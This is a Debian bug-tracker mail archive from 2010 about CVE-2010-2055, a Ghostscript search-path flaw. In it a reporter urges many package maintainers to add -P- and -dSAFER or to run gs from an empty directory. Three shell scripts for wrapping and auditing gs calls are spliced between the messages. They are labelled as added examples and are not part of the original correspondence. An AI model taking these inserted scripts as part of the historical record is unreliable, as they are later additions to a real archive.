or for whom such is run by his mail client or whatever.

> I suppose implementing a filepath check as suggested by Werner Fink
> is the best course of action.

Do you mean http://bugs.ghostscript.com/show_bug.cgi?id=691350#c18 ?
Is not that "search only in /usr/share/ghostscript" idea even more
restrictive than -P- which excludes "." only?

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584667: Bug#583183: CVE-2010-2055

2010-07-13 Thread paul . szabo
Seems that bug
  http://bugs.debian.org/583183
(which is now archived, un-changeable) or maybe one of the "derivatives"
  http://bugs.debian.org/584653
  http://bugs.debian.org/584663
  http://bugs.debian.org/584667
is being tracked as CVE-2010-2055.

Another somewhat useful reference is
  https://bugzilla.redhat.com/show_bug.cgi?id=599564

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#583183: Scribus -dPARANOIDSAFER

2010-06-03 Thread paul . szabo
Dear Oleksandr,

> In Scribus we call gs with -dPARANOIDSAFER. Is that sufficient to
> avoid this problem?

Not sufficient, you need -P- also.

I do not expect "upstream" ghostscript.com (artifex.com) to make -P- the
default, I do not know if Debian will.

(There are other bugs with gs, thus it is unsafe with all those options,
but those are being worked on upstream and should make it into Debian,
eventually.)

Cheers, Paul (noting I am no gs expert, nor Debian maintainer)

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584022: page-crunch: Security bugs in ghostscript

2010-06-03 Thread paul . szabo
Dear Sylvain,

> OK, so as far as I understand, we'd better pass '-dSAFER -P-' to
> 'ps2pdf' (which is AFAICS the only ghostscript script that's used in
> page-crunch).

My lenny /usr/bin/ps2pdf (really /usr/bin/ps2pdfwr) already includes
-dSAFER. Yes you could (should?) pass -P- to it. I expect that to be
fixed in the Debian ghostscript, sometime, anyway.

Or, you could run ps2pdf in a "safe" directory, chdir to "/" or some
empty directory, as cups and gv do (or will do):
http://bugs.debian.org/584002
http://bugs.debian.org/583316
to also be protected against some as-yet-unpatched (but hopefully
upcoming) gs bugs.

Hope this helps...

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
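
The two mitigations that recur in this thread, always passing -P- -dSAFER (the 2010-08-06 message on "-P- which excludes '.' only" and -dNOSAFER) and running gs from "/" or an empty directory as cups and gv do (the page-crunch advice just above), combined into one wrapper that a script such as a ps2pdf caller could use. This is an added example, not code from Paul's messages or from the Debian ghostscript, cups or gv packages. GS_BIN is an assumed override so the wrapper can be exercised against a stand-in; it defaults to "gs".

```shell
#!/bin/sh
# Added example (not from the bug thread): hardened ghostscript wrapper.
# GS_BIN is an assumed hook for testing; the real binary is simply "gs".
GS_BIN="${GS_BIN:-gs}"

# safe_gs INPUTFILE [GSOPTIONS...]
# Output paths given to gs (-o, -sOutputFile=) must be absolute, because the
# working directory is changed before gs starts.
safe_gs() {
    if [ $# -lt 1 ]; then
        echo "usage: safe_gs INPUTFILE [GSOPTIONS...]" >&2
        return 2
    fi
    input="$1"; shift
    if [ ! -f "$input" ]; then
        echo "safe_gs: no such file: $input" >&2
        return 2
    fi
    # Absolute path to the input, since we are about to leave this directory.
    case "$input" in
        /*) abs="$input" ;;
        *)  abs="$(pwd)/$input" ;;
    esac
    # Refuse caller options that would undo the hardening: -P re-enables the
    # lookup in ".", -dNOSAFER disables the file-access restrictions.
    for a in "$@"; do
        case "$a" in
            -P|-dNOSAFER)
                echo "safe_gs: refusing option $a" >&2
                return 3 ;;
        esac
    done
    # Fresh empty directory: nothing an attacker placed next to the input
    # can be found by a relative lookup, whatever gs's search path does.
    scratch=$(mktemp -d) || return 1
    # Subshell so the cd does not leak into the caller; -dBATCH -dNOPAUSE
    # keep gs from dropping into its interactive prompt.
    ( cd "$scratch" && exec "$GS_BIN" -P- -dSAFER -dBATCH -dNOPAUSE "$@" "$abs" )
    rc=$?
    rmdir "$scratch" 2>/dev/null
    return "$rc"
}
```

Usage: `safe_gs in.ps -sDEVICE=pdfwrite -sOutputFile=/abs/path/out.pdf`. The scratch directory is only removed if gs left it empty, so a stray file written there is kept for inspection rather than silently deleted.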



Bug#584015: ijsgutenprint: Security bugs in ghostscript

2010-06-02 Thread paul . szabo
Dear Roger,

>>> Have you considered a whole-archive search for e.g. -dSAFER in
>>> the lintian lab? ...
>>
>> Sorry, do not know how to do that search. Can you explain?
>
> One of the Debian machines has the complete unpacked source trees for 
> every package in Debian on it, used for running Lintian.  You could 
> simply run grep over the entire lot to identify all uses of -dSAFER in 
> the tree with or without -P-.
>
> If you're not a Debian developer, you won't have access, but you could 
> ask someone to run it for you and send you the results.  I don't have 
> time to do this myself for you right now, but I'm sure you could ask 
> someone on -devel; if you don't have any luck I can possibly try at the 
> weekend.

Thanks for the explanation, and the offer to help. I am not a developer.

Sorry I do not think I will have time to follow this up, now, to that
detail: am going on holidays, for four weeks starting this weekend, and
will not have computer access during that time.

If the issue is still outstanding in July then I will work on it again,
and may ask for your help then.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584001: courier-faxmail: Security bugs in ghostscript

2010-06-02 Thread paul . szabo
Dear Racke,

> What is the plan for the package in Debian stable?

Sorry, I have no idea. I do not know if the fixed courier-faxmail will
be included in stable (lenny). I guess that could only happen via a DSA,
I do not recall any other type of improvements until the next "release".

And I do not know if ghostscript will ever be fixed in any sense.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584015: ijsgutenprint: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Roger,

> ijsgutenprint is a ghostscript IJS server driver.  It's invoked
> /by/ ghostscript, so is not itself responsible for running
> ghostscript.  One potential source of vulnerabilities is
> actually in glue scripts such as Foomatic, so I think probably
> should be reassigned to foomatic-db-gutenprint.  Note that
> most/all of Foomatic and ancillary data packages such
> as foomatic-db-gutenprint are packages you should probably
> look at.

Speaking to the printconf maintainer in
http://bugs.debian.org/584026
he said that foomatic-filters is only affected. Maybe he knows, he is
also the foomatic maintainer...

> Have you considered a whole-archive search for e.g. -dSAFER in
> the lintian lab? ...

Sorry, do not know how to do that search. Can you explain?

> ... If a program is using -dSAFER, it should also
> be using -P- in all likelihood.  It's probably better than
> simply going off package dependencies.

Responses to the various bugs show that no-one was aware of -P-, many
still stubbornly say "I use -dSAFER thus am safe". I am not sure now if
there was anyone without -dSAFER.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#583183: [Pkg-cups-devel] Bug#584003: cups-pdf: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Martin-Eric,

> ... We already call -dSAFER and drop privileges early, so we're
> already protected as it is. Closing.

Sorry, you seem to misunderstand: this bug is (more-or-less) about the
need to use the -P- also, as well as -dSAFER, to be protected.

Is cups-pdf "part of" cups? In that case you may be "safe" because of
chdir("/"), see http://bugs.debian.org/584002 .

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#583995: advi-examples: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Mehdi,

>>>>> On a side note, you should check ...
> In case, it isn't obvious: I already read 583183 before closing and I
> explained why advi-examples isn't open to such flaws.

I see: that comment was not directed at me.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#583995: advi-examples: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Mehdi,

>>> On a side note, you should check ...
>>
>> Thanks for that pointer. I guess you are right. But please see...
>
> No.

Sorry, but I do not understand. Do you mean that you refuse to read, or
that you disagree? Maybe you would care to explain, I would like to know
your opinion.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584013: hyperlatex: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Ronald,

> I.e., you consider hyperlatex as "fixed" with regard to #584013 when
> "-P- -dSAFER" are added to the gs calls?

If you have done that then I would not insist on keeping the bug open.
Whether "fixed", only you can tell: sorry I do not use hyperlatex
so cannot comment. (Please see the contortions that gv is going to
to protect themselves in http://bugs.debian.org/583316 .)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584052: kdelibs4c2a: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Sune,

I agree with you. I suggested to gs that it should be secure-by-default,
but they refused. Please do convince them...

In the meantime, maybe you want to fix your use of that crappy gs.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584001: courier-faxmail: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Racke,

> ... I just wonder why this option isn't mentioned in the gs manpage.

Good question. Maybe report as a bug to ghostscript?

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584062: sdf: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Colin,

Your explanation shows you are not directly responsible (maybe not
vulnerable at all), and can close the bug.

Thanks for investigating, sorry about the "noise".

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584001: courier-faxmail: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Racke,

> What kind of fixes do you have in mind?

Please add the  -P-  option to all $GS invocations.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584013: hyperlatex: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Roland,

> (1) If ghostscript has a bug, maybe it should be fixed there instead of
> in all gs dependant packages?

Yes, but gs says "cannot fix" and "please use -P-".

> (2) Mass bug filing (esp. RC/security) is generally not a great idea,
> especially if
> (3) You haven't checked the individual packages ("This package depends
> on ghostscript, and may be affected").

Sorry, I do my best but am only one. 

> (4) Please state clearly what's wrong with the package (hyperlatex in
> this case). From the other bug reports I deduce that gs calls should be
> extended with "-P- -dSAFER". This should be done in the hyperlatex
> source package in bin/ps2image, for the record.

Yes, that probably should fix things. (Right now things are still unsafe
even with those options, but I expect gs to be able to fix the remaining
bugs.)

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584026: printconf: Security bugs in ghostscript

2010-06-01 Thread paul . szabo
Dear Chris,

I now see what tripped me up: in my Packages file, printconf depends on
ghostscript, but foomatic-filters doesn't. Maybe that could be fixed?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584061: recoll: Security bugs in ghostscript

2010-05-31 Thread paul . szabo
Dear Giuseppe,

> I'm slightly puzzled by your mass-bug filing. Why you opened bugs for
> packages that suggest ghostscript...?

I was not sure what relationship is implied by "suggest". It turns out
that even "depends on" (or my parsing of the Packages file?) was not so
good, I "hit" printconf instead of foomatic-filters apparently.

But in essence, because I was asked to do so: please see
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#42
and thereabouts.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584026: printconf: Security bugs in ghostscript

2010-05-31 Thread paul . szabo
reopen 584026
reassign 584026 foomatic-filters
thanks


Dear Chris,

> ... doesn't apply to printconf.  foomatic-filters is the only
> Foomatic-related package that is affected by calling gs directly,
> and I assume your mass-filed bug reports have hit that one too.

Sorry, no. Seems my "pick out packages that depend on gs" did not
find foomatic-filters, but it (wrongly?) found printconf. Also, I
misunderstood you: thought that those foomatic things you spoke about
were part of printconf.

> If they haven't, you can reopen and reassign this one ...

Doing so (attempting) now.

> As for foomatic-filters itself: the only files specified on the
> command line are /dev/fd/0 and /dev/fd/3, and gs is called with
> -DPARANOIDSAFER (which appears to be equivalent to -DSAFER nowadays).
> That would seem to narrow the vulnerability window, assuming only
> files in /dev/fd could be accessed ...

Sorry, you seem to misunderstand the bug. If the command is ever run in
a writable directory, say after "cd /tmp", then an attacker can cause code
to run as the user running foomatic. Say this is for printing: then
surely users can send print files; if they have some control over the
name, and foomatic runs in that directory, then it is doomed.

Thanks for your help.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584061: recoll: Security bugs in ghostscript

2010-05-31 Thread paul . szabo
Dear Kartik,

> I don't think this bug is correct for recoll. recoll only 'suggests'
> ghostscript and don't use code from ghostscript. Filing bug at 'gs
> package seems right. 

Thanks for the info.

> CC'ng upstream to know more view. Also CC'ng security team if it is
> valid to file a bug like this.

Thanks, please let me know what you find. Please also see
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#42

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584064: texlive-base-bin: Security bugs in ghostscript

2010-05-31 Thread paul . szabo
Dear Norbert,

> That is right, but still it is a bug of ghostscript and should
> be treated there, not anywhere else.

Yes. And when they advise you to use -P- (and refuse to make that the
default), you just need to follow: you need to change. (But yes, such
a gs requirement, leaving it "insecure by default", is insane.)

I note that right now, gs is unsafe even with -P-.

> Furthermore, gs is not run with extended priviliges, so that
> does not compromise the system unless the cups code is forwarding
> that to gs.

Only affects the users of cups: all user accounts are now compromised.
I also guess that cups may be used for printing... I do not know whether
that runs as root (compromising the whole machine) or as user "printer"
(allowing attackers to "steal" sensitive printouts).

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584069: gimp: Security bugs in ghostscript

2010-05-31 Thread paul . szabo
Dear Ari,

Seems that you need to call gs with -P- also; and ensure any files
(to read) passed as command-line arguments are "full pathnames".
Pre-creating an empty directory and running gs there, as gv
  http://bugs.debian.org/583316
intends to do, might help.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
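The hardening that the foomatic-filters reply and the gimp reply above both describe (call gs with -P- and -dSAFER, pass input files as full pathnames, and run gs from a pre-created empty directory instead of a user-writable one such as /tmp), written out as a small POSIX shell wrapper. This is an added example, not code from Debian or from any package named in this thread. The variable name GS, the function name safe_gs and the "--" separator between gs options and input files are this example's own conventions. The private scratch directory is the part that still matters when, as noted in the thread, gs_init.ps was read from the current directory even with -P-.

```shell
#!/bin/sh
# safe_gs: run Ghostscript from a fresh, private, empty working directory.
#
# Ghostscript's search path could include the current directory, so a gs
# run in an attacker-writable directory can pick up planted files
# (gs_init.ps, Encoding/, ...). This wrapper (an illustrative example, not
# code from any package in the thread) removes that exposure three ways:
#   1. input files are converted to absolute paths before the chdir;
#   2. -P- and -dSAFER are inserted after the caller's options, ahead of
#      the input files;
#   3. gs runs inside a 0700 mktemp directory that is deleted afterwards.
# GS (an assumed name) selects the Ghostscript binary; the caller separates
# options from input files with "--".

GS="${GS:-gs}"

# abspath FILE: print an absolute path for FILE (directory part canonicalised).
abspath() {
    case $1 in
        /*) printf '%s\n' "$1" ;;
        *)  dir=$(cd -- "$(dirname -- "$1")" && pwd) || return 1
            printf '%s/%s\n' "$dir" "$(basename -- "$1")" ;;
    esac
}

# safe_gs [gs options...] -- FILE...
# Rebuilds the argument list in place (POSIX sh has no arrays): options are
# passed through, "--" becomes "-P- -dSAFER", and every FILE is made absolute
# so it still resolves after the directory change.
safe_gs() {
    n=$# ; i=0 ; seen_sep=0
    while [ "$i" -lt "$n" ]; do
        arg=$1 ; shift
        if [ "$seen_sep" -eq 1 ]; then
            arg=$(abspath "$arg") || return 1
            set -- "$@" "$arg"
        elif [ "$arg" = "--" ]; then
            seen_sep=1
            set -- "$@" -P- -dSAFER
        else
            set -- "$@" "$arg"
        fi
        i=$((i + 1))
    done
    # No "--" given: treat everything as options and still add the flags.
    [ "$seen_sep" -eq 1 ] || set -- "$@" -P- -dSAFER

    workdir=$(mktemp -d) || return 1
    chmod 700 "$workdir"
    # Subshell: the chdir must not leak into the caller.
    (cd "$workdir" && "$GS" "$@")
    status=$?
    rm -rf "$workdir"
    return "$status"
}

# Run directly: safe_gs.sh [gs options] -- file...
if [ $# -gt 0 ]; then
    safe_gs "$@"
fi
```

Output files named with -sOutputFile= are gs options, so they must be given as absolute paths too; a relative one would be written into the scratch directory and deleted with it.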



Bug#583183: /usr/bin/gs: Insecure gs initialization

2010-05-31 Thread paul . szabo
>>Should some or all be alerted to this security issue? So far gv and
>>libspectre1 only have been alerted (bugs #583316 and #583634).
>
> Yes, please.

Done, all mentioned packages alerted:

  http://bugs.debian.org/584039 a2ps
  http://bugs.debian.org/583994 advi
  http://bugs.debian.org/583995 advi-examples
  http://bugs.debian.org/584040 apsfilter
  http://bugs.debian.org/583996 asymptote
  http://bugs.debian.org/583997 bmv
  http://bugs.debian.org/583998 c2050
  http://bugs.debian.org/584000 capisuite
  http://bugs.debian.org/584041 caspar
  http://bugs.debian.org/584042 cd-circleprint
  http://bugs.debian.org/584043 cedilla
  http://bugs.debian.org/584001 courier-faxmail
  http://bugs.debian.org/584002 cups
  http://bugs.debian.org/584003 cups-pdf
  http://bugs.debian.org/584044 dblatex
  http://bugs.debian.org/584045 derivations
  http://bugs.debian.org/584046 efax
  http://bugs.debian.org/584004 epix1
  http://bugs.debian.org/584005 epstool
  http://bugs.debian.org/584006 fbi
  http://bugs.debian.org/584007 fig2ps
  http://bugs.debian.org/584008 flpsed
  http://bugs.debian.org/584069 gimp
  http://bugs.debian.org/584047 grace
  http://bugs.debian.org/584048 grace6
  http://bugs.debian.org/583316 gv
  http://bugs.debian.org/584009 hevea
  http://bugs.debian.org/584010 hpijs
  http://bugs.debian.org/584049 hpoj
  http://bugs.debian.org/584011 hylafax-client
  http://bugs.debian.org/584012 hylafax-server
  http://bugs.debian.org/584013 hyperlatex
  http://bugs.debian.org/584014 ifhp
  http://bugs.debian.org/584015 ijsgutenprint
  http://bugs.debian.org/584050 impose+
  http://bugs.debian.org/584052 kdelibs4c2a
  http://bugs.debian.org/584051 kdissert
  http://bugs.debian.org/584016 kghostview
  http://bugs.debian.org/584017 latex-make
  http://bugs.debian.org/584053 latex-mk
  http://bugs.debian.org/584054 latexmk
  http://bugs.debian.org/584018 libgs-dev
  http://bugs.debian.org/583634 libspectre
  http://bugs.debian.org/584019 logidee-tools
  http://bugs.debian.org/584055 lpr
  http://bugs.debian.org/584020 lsb-printing
  http://bugs.debian.org/584021 mediawiki-math
  http://bugs.debian.org/584056 mgetty-fax
  http://bugs.debian.org/584057 mpage
  http://bugs.debian.org/584058 opensched
  http://bugs.debian.org/584022 page-crunch
  http://bugs.debian.org/584023 passepartout
  http://bugs.debian.org/584024 pkpgcounter
  http://bugs.debian.org/584059 plywood
  http://bugs.debian.org/584025 pnm2ppa
  http://bugs.debian.org/584026 printconf
  http://bugs.debian.org/584037 prosper
  http://bugs.debian.org/584027 ps2eps
  http://bugs.debian.org/584028 pspresent
  http://bugs.debian.org/584029 pstoedit
  http://bugs.debian.org/584030 pstotext
  http://bugs.debian.org/584060 python-codespeak-lib
  http://bugs.debian.org/584031 pyxplot
  http://bugs.debian.org/584061 recoll
  http://bugs.debian.org/584032 scribus
  http://bugs.debian.org/584033 scribus-ng
  http://bugs.debian.org/584062 sdf
  http://bugs.debian.org/584063 tex4ht-common
  http://bugs.debian.org/584064 texlive-base-bin
  http://bugs.debian.org/584034 texmacs
  http://bugs.debian.org/584035 webmagick
  http://bugs.debian.org/584065 wv
  http://bugs.debian.org/584066 xapian-omega
  http://bugs.debian.org/584067 xfig
  http://bugs.debian.org/584036 xournal
  http://bugs.debian.org/584068 xpaint
  http://bugs.debian.org/584038 zope-textindexng3

Other references of interest (some been mentioned already):

  http://www.securityfocus.com/archive/1/511433
  http://www.securityfocus.com/archive/1/511472
  http://www.securityfocus.com/archive/1/511492
  http://www.securityfocus.com/archive/1/511512
  http://www.securityfocus.com/archive/1/511561
  http://www.securityfocus.com/bid/40369 Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
  http://bugs.ghostscript.com/show_bug.cgi?id=691339 Insecure gs initialization
  http://bugs.ghostscript.com/show_bug.cgi?id=691350 gs_init.ps tried in current dir despite -P-
  http://bugs.ghostscript.com/show_bug.cgi?id=691355 Missing -P- and -dSAFER in scripts
  http://bugs.ghostscript.com/show_bug.cgi?id=691356 Relative filenames in scripts

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
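For the "please evaluate the security of this package" requests in this thread, and the Ghostscript bug listed above about scripts missing -P- and -dSAFER, a checker that scans a shell script for gs invocations lacking those options. This is an added example, not code from Debian or from any package named here. The function name audit_gs_calls and the detection heuristic (a command word gs, ghostscript, $GS or ${GS}, optionally with an absolute path prefix) are assumptions of the example, and -dPARANOIDSAFER is accepted as equivalent to -dSAFER, as one reply above states. The other script bug listed, relative filenames, still needs a manual read of each flagged line.

```shell
#!/bin/sh
# audit_gs_calls SCRIPT: flag Ghostscript invocations in a shell script that
# lack -P- (no current-directory search) or -dSAFER.
#
# Illustrative checker, not code from any package in the thread. It keys on
# the command word gs / ghostscript / $GS / ${GS}, optionally preceded by an
# absolute path, at the start of a line or after whitespace, a double quote
# or a shell operator. Assignments such as GS=/usr/bin/gs are not matched
# because "=" is not in that set. -dPARANOIDSAFER counts as -dSAFER.
#
# Prints "FILE:LINE: missing <flags>" per offending line; returns 1 if
# anything was found, 0 if clean, 2 if the file is unreadable.

audit_gs_calls() {
    [ -r "$1" ] || return 2
    grep -nE '(^|[[:space:]";&|(])(/[^[:space:]]*/)?(gs|ghostscript|\$GS|\$\{GS\})([[:space:]"]|$)' "$1" |
    awk -v file="$1" '
        {
            missing = ""
            if ($0 !~ /-P-([[:space:]]|$)/)                missing = missing " -P-"
            if ($0 !~ /-d(PARANOID)?SAFER([[:space:]]|$)/) missing = missing " -dSAFER"
            if (missing != "") {
                split($0, f, ":")        # grep -n prefixes each line with "LINE:"
                printf "%s:%s: missing%s\n", file, f[1], missing
                found = 1
            }
        }
        END { exit found + 0 }'
}

# Run directly: audit_gs.sh SCRIPT... (exit 1 if any script has findings)
if [ $# -gt 0 ]; then
    rc=0
    for script in "$@"; do
        audit_gs_calls "$script" || rc=1
    done
    exit "$rc"
fi
```

Lines that build a gs command from a variable other than GS, or that continue it across backslash-newlines, are outside what this line-oriented check sees, so a clean run is a starting point for the maintainer's review, not a verdict.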



Bug#584069: gimp: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: gimp
Version: 2.4.7-1
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages gimp depends on:
ii  gimp-data 2.4.7-1Data files for GIMP
ii  libaa11.4p5-37+b1ascii art library
ii  libart-2.0-2  2.3.20-2   Library of functions for 2D graphi
ii  libatk1.0-0   1.22.0-1   The ATK accessibility toolkit
ii  libc6 2.7-18lenny2   GNU C Library: Shared libraries
ii  libcairo2 1.6.4-7The Cairo 2D vector graphics libra
ii  libdbus-1-3   1.2.1-5+lenny1 simple interprocess messaging syst
ii  libdbus-glib-1-2  0.76-1 simple interprocess messaging syst
ii  libexif12 0.6.16-2.1 library to parse EXIF files
ii  libfontconfig12.6.0-3generic font configuration library
ii  libfreetype6  2.3.7-2+lenny1 FreeType 2 font engine, shared lib
ii  libgimp2.02.4.7-1Libraries for the GNU Image Manipu
ii  libglib2.0-0  2.16.6-3   The GLib library of C routines
ii  libgtk2.0-0   2.12.12-1~lenny1   The GTK+ graphical user interface 
ii  libgtkhtml2-0 2.11.1-2   HTML rendering/editing library - r
ii  libhal1   0.5.11-8   Hardware Abstraction Layer - share
ii  libjpeg62 6b-14  The Independent JPEG Group's JPEG 
ii  liblcms1  1.17.dfsg-1+lenny2 Color management library
ii  libmng1   1.0.9-1Multiple-image Network Graphics li
ii  libpango1.0-0 1.20.5-5+lenny1Layout and rendering of internatio
ii  libpng12-01.2.27-2+lenny3PNG library - runtime
ii  libpoppler-glib3  0.8.7-3PDF rendering library (GLib-based 
ii  librsvg2-22.22.2-2lenny1 SAX-based renderer library for SVG
ii  libtiff4  3.8.2-11.2 Tag Image File Format (TIFF) libra
ii  libwmf0.2-7   0.2.8.4-6+lenny1   Windows metafile conversion librar
ii  libx11-6  2:1.1.5-2  X11 client-side library
ii  libxext6  2:1.0.4-1  X11 miscellaneous extension librar
ii  libxmu6   2:1.0.4-1  X11 miscellaneous utility library
ii  libxpm4   1:3.5.7-1  X11 pixmap library
ii  zlib1g1:1.2.3.3.dfsg-12  compression library - runtime

Versions of packages gimp recommends:
ii  gimp-gnomevfs 2.4.7-1GNOME-VFS URI plugin for GIMP
ii  gimp-python   2.4.7-1Python support and plugins for GIM

Versions of packages gimp suggests:
ii  ghostscript8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
pn  gimp-data-extras   (no description available)
pn  gimp-help-en | gim (no description available)
ii  libasound2 1.0.16-2  ALSA library
pn  libgimp-perl   (no description available)

-- no debconf information



Bug#584068: xpaint: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: xpaint
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages xpaint depends on:
ii  libc6  2.7-18lenny2  GNU C Library: Shared libraries
ii  libjpeg62  6b-14 The Independent JPEG Group's JPEG 
pn  libpng2(no description available)
pn  libtiff3g  (no description available)
ii  libxaw72:1.0.4-2 X11 Athena Widget library
pn  xlibs  (no description available)
ii  zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime

xpaint recommends no packages.

Versions of packages xpaint suggests:
pn  eeyes  (no description available)
ii  netpbm  2:10.0-12+lenny1 Graphics conversion tools



Bug#584067: xfig: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: xfig
Version: 1:3.2.5-rel-3
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages xfig depends on:
ii  libc62.7-18lenny2GNU C Library: Shared libraries
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libpng12-0   1.2.27-2+lenny3 PNG library - runtime
ii  libx11-6 2:1.1.5-2   X11 client-side library
ii  libxi6   2:1.1.4-1   X11 Input extension library
ii  libxpm4  1:3.5.7-1   X11 pixmap library
ii  libxt6   1:1.0.5-3   X11 toolkit intrinsics library
ii  xaw3dg   1.5+E-17Xaw3d widget set

Versions of packages xfig recommends:
ii  transfig 1:3.2.5-rel-3.1 Utilities for converting XFig figu
pn  xfig-libs  (no description available)

Versions of packages xfig suggests:
pn  cups-client | lpr  (no description available)
ii  ghostscript8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gimp   2.4.7-1   The GNU Image Manipulation Program
ii  gsfonts-x110.21  Make Ghostscript fonts available t
ii  netpbm 2:10.0-12+lenny1  Graphics conversion tools
